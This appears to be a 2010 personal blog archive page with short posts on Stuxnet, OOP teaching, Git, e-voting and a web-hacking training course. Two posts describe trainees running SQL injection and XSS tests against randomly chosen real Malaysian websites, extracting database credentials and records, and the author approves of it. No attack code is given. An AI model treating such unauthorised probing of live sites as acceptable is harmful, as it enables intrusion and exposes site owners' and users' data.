November 2010 – Page 2 – Technical Intercourse

Stuxnet Worm

This video comprehensively explains how a hypothetical attack could be carried out by an attacker using the Stuxnet worm. This has very serious implications because it means that low-level industrial embedded systems are also now targets for attack. These SCADA systems are used everywhere and lack the necessary resources to defend themselves from attack.

The technique used is a fairly straight-forward one. The attacker can download and modify a programming library and use that to intercept the actual programme being downloaded onto the SCADA system.

This technique has been used for ages, in a non-malicious way. For example, my Xilinx board does not properly support my OS for programming. Thankfully, someone out there has written an open source driver to intercept all the Xilinx calls. Install this driver and the Xilinx ISE will think that it is talking to its own driver while all its calls are actually being intercepted by the wrapper.

Interesting, and cool.

This makes me think that I will probably need to build in some protection to my future cores to at least enable a limited amount of security checking of downloaded code.

Physical Programming #105: Duffy Objects

I ended up giving a short 1-hour lecture at work today, about object-oriented programming. OOP is a confusing enough paradigm as it is without having to indoctrinate my kids with more behind the scenes stuff. However, over the course of actually explaining to them about OOP, I came to realise that the reason why I understand OOP better than them is because I understand physical programming.

So, I thought to myself, it would be useful to include a chapter in my book on OOP – a behind the scenes picture.

Then, while reading stuff on the Internet today, I came across something called Duff’s Device. It is something that I had learned about a while ago but had forgotten. And again, I realise that it is a problem only to people who do not understand physical programming aspects as well. Again, it will make a good example chapter for my book.

Seems like I will have to expand the physical programming aspects to include lots of behind-the-scenes examples of common operations.

Day 2 – SQL Injection

We learned about SQL injection today and were just randomly picking Malaysian websites to test it on. This is the result that I managed to get with a local organisation’s website (which shall remain nameless). I managed to find out the version of MySQL server that they were running (5.0.45) and also the account credentials for that MySQL server (root@localhost).

Nice!

Our trainer was able to exploit this further and enumerate a whole bunch of stuff, including all the user login credentials for their MySQL database, a list of all their databases and column fields, a dump of all the records of any selected database and more. This is not a bad reflection on MySQL as our trainer says that MySQL databases are amongst the hardest to attack.

However, if there system administrator is not doing their jobs correctly, things can get screwed.

Hacker Halted – Day 1

I attended Day 1 of Hacker Halted today. I signed up for Workshop 1 – on web-application hacking – because I wanted to learn more about it. Our morning started with mainly basic stuff on the underlying mechanism behind web applications – HTTP protocol, DNS services and what nots.

Our afternoon session was more interesting, with our trainer – Sean Arries – showing us the information gathering aspect of web-application hacking (vulnerability analysis). This is done in order to increase the attack space of the target. The thing that I learned from this section of the training is that – sites are far more vulnerable from side-channel and internal attacks than direct external attacks.

The tools that I already knew (and are part of every System Admin’s arsenal) were things like whois, dig, nslookup, host and other network layer stuff. However, at the application level, I learned how to use XSS ME. Manually testing cross-site scripting (XSS) is quite fun.

The basic techniques shown were really useful. We even practiced it on a number of prominent local Malaysian sites. Very interesting. Tomorrow, we get to the actual act of attacking web applications (penetration testing) and see if we can pwn any machines. I am looking forward to hacking my own websites.

Git in Action

Git in Action from Ralf Ebert on Vimeo.

As a Git user myself, I dare say that this is an excellent 18 minute introduction to git. Someone should be immediately productive after watching this video. I’m going to make it compulsory for all my new staff who do not know Git.

Verifying Anonymity

When it comes to electronic voting, the biggest problem has always been the divergent requirements of maintaining the anonymity of a ballot versus the authentication and verification of a voter with the ballot. There is a lot of research going on to ensure that all of these requirements are taken care of. While the following is a good step in the right direction, it has one specific assumption – that the ballot sheets are given out randomly. It is unlikely that such a thing can be done fairly and easily.